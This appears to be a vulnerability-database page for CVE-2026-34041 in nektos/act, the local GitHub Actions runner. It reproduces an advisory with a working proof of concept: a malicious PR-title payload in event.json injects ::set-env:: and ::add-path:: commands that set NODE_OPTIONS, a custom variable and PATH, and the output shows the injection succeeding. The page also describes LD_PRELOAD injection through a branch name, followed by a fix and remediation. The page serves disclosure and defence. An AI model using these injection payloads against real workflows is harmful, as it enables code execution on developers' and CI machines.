Docker
CVE-2026-34041
HIGH
Severity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes act strictly less secure than GitHub Actions for the same workflow file.
Vulnerable Code
pkg/runner/command.go, lines 52-58:
switch command {
case "set-env":
rc.setEnv(ctx, kvPairs, arg)
case "set-output":
rc.setOutput(ctx, kvPairs, arg)
case "add-path":
rc.addPath(ctx, arg)There is no check for the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable. The string ACTIONS_ALLOW_UNSECURE_COMMANDS does not appear anywhere in the act codebase.
On GitHub Actions, these commands are rejected unless ACTIONS_ALLOW_UNSECURE_COMMANDS=true is set:
Error: The `set-env` command is disabled. Please upgrade to using Environment Files
or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.PoC: Environment and PATH Injection via PR Title
Tested on: act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0
Step 1 - Create a workflow that logs PR metadata:
.github/workflows/vuln.yml:
name: Vulnerable Workflow
on: [pull_request]
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Log PR info
run: |
echo "Processing PR: ${{ github.event.pull_request.title }}"
- name: Subsequent step - check environment
run: |
echo "=== Environment Injection Check ==="
echo "NODE_OPTIONS=$NODE_OPTIONS"
echo "EVIL_VAR=$EVIL_VAR"
echo "PATH=$PATH"Step 2 - Create a malicious event payload:
event.json:
{
"pull_request": {
"title": "Fix typo\n::set-env name=EVIL_VAR::INJECTED_BY_ATTACKER\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js\n::add-path::/tmp/evil-bin",
"number": 1,
"head": { "ref": "fix-typo", "sha": "abc123" },
"base": { "ref": "main", "sha": "def456" }
}
}Step 3 - Run:
git init && git add -A && git commit -m "init"
act pull_request -e event.jsonResult:
[Vulnerable Workflow/build] | Processing PR: Fix typo
[Vulnerable Workflow/build] ⚙ ::set-env:: EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build] ⚙ ::set-env:: NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build] ⚙ ::add-path:: /tmp/evil-bin
[Vulnerable Workflow/build] ✅ Success - Main Log PR info
[Vulnerable Workflow/build] | === Environment Injection Check ===
[Vulnerable Workflow/build] | NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build] | EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build] | PATH=/tmp/evil-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[Vulnerable Workflow/build] | EXPLOITED: EVIL_VAR was injected into this step!
[Vulnerable Workflow/build] ✅ Success
[Vulnerable Workflow/build] 🏁 Job succeededAll three injections succeeded silently:
EVIL_VAR=INJECTED_BY_ATTACKER- arbitrary env var injected into subsequent stepNODE_OPTIONS=--require=/tmp/evil.js- Node.js code execution vector/tmp/evil-binprepended to PATH - command hijacking vector
Attack Scenarios
Scenario 1: Malicious PR title/body. An attacker opens a PR with ::set-env name=NODE_OPTIONS::--require=/tmp/evil.js embedded in the title. If any workflow step echoes the title (common for build summaries, Slack notifications, changelog generation), the injection fires. On GitHub Actions this is blocked. On act, it succeeds.
Scenario 2: Malicious branch name. ${{ github.head_ref }} is attacker-controlled. A branch named fix-typo%0A::set-env name=LD_PRELOAD::/tmp/evil.so can inject LD_PRELOAD, which causes every subsequent dynamically-linked binary to load the attacker's shared library.
Scenario 3: Commit message injection. If a step runs git log --oneline and the output flows to stdout, an attacker's commit message containing ::set-env:: commands will be processed.
Impact
- Command injection via env vars:
LD_PRELOAD,NODE_OPTIONS,PYTHONPATH,BASH_ENV,PERL5OPTall enable arbitrary code execution - PATH hijacking: attacker-controlled directory prepended to PATH hijacks any subsequent command
- Cross-step escalation: a step that merely logs untrusted data compromises all subsequent steps
- Supply chain risk: workflows that are safe on GitHub Actions become exploitable when run locally with act - developers have a false sense of security
Suggested Fix
Add a check matching GitHub Actions' behavior:
case "set-env":
if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
logger.Errorf("The `set-env` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
return false
}
rc.setEnv(ctx, kvPairs, arg)
case "add-path":
if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
logger.Errorf("The `add-path` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
return false
}
rc.addPath(ctx, arg)This is a minimal, backwards-compatible fix - users who genuinely need these deprecated commands can opt in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true, matching GitHub's approach.
---
Written by Golan Myers
AnalysisAI
Command injection in nektos/act (GitHub Actions local runner) allows attackers to execute arbitrary code by embedding deprecated workflow commands in untrusted input. Act versions prior to 0.2.86 unconditionally process ::set-env:: and ::add-path:: commands that GitHub Actions disabled in 2020, enabling PATH hijacking and environment variable injection when workflows echo PR titles, branch names, or commit messages. Publicly available exploit code exists with working proof-of-concept demonstrating NODE_OPTIONS and LD_PRELOAD injection vectors. This creates a critical supply chain risk where workflows safe on GitHub Actions become exploitable when developers test them locally with act.
Technical ContextAI
This vulnerability exploits act's command processing engine (pkg/runner/command.go) which parses GitHub Actions workflow commands from step output. When steps echo untrusted data to stdout, act scans for special command sequences like ::set-env name=VAR::value that modify the execution environment. GitHub Actions disabled these legacy commands in October 2020 (CVE-2020-15228) due to environment injection risks, requiring explicit opt-in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true. Act's implementation lacks this guard check entirely, making it strictly less secure than the platform it emulates. The root cause is CWE-74 (Improper Neutralization of Special Elements in Output), where the command parser treats untrusted output as trusted control instructions. Affected product pkg:go/github.com_nektos_act processes workflow YAML files in Docker containers, with injected environment variables persisting across all subsequent job steps. Attack vectors include PR metadata (title, body), branch names (github.head_ref), and git commit messages - all commonly logged by CI workflows.
RemediationAI
Upgrade to act version 0.2.86 or later, released by the vendor with commit 0c739c8e39c41aa5a07665f732da9cab6df0097a implementing the security fix. The patch adds validation requiring ACTIONS_ALLOW_UNSECURE_COMMANDS=true environment variable before processing deprecated ::set-env:: and ::add-path:: commands, matching GitHub Actions' security model. Download the patched release from https://github.com/nektos/act/releases/tag/v0.2.86. Organizations unable to immediately upgrade should implement workflow hardening: avoid echoing untrusted input (PR titles, branch names, commit messages) directly to stdout, sanitize user-controlled strings before logging, and consider using GitHub-hosted runners for security-sensitive workflows instead of local act execution. Review existing workflows for patterns that echo github.event.pull_request.title, github.head_ref, or git log output. No effective workaround exists within vulnerable act versions as the command processing occurs unconditionally. The vendor advisory at https://github.com/nektos/act/security/advisories/GHSA-xmgr-9pqc-h5vw provides additional context and remediation guidance.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same technique Command Injection
View allVendor StatusVendor
SUSE
Severity: Critical| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-xmgr-9pqc-h5vw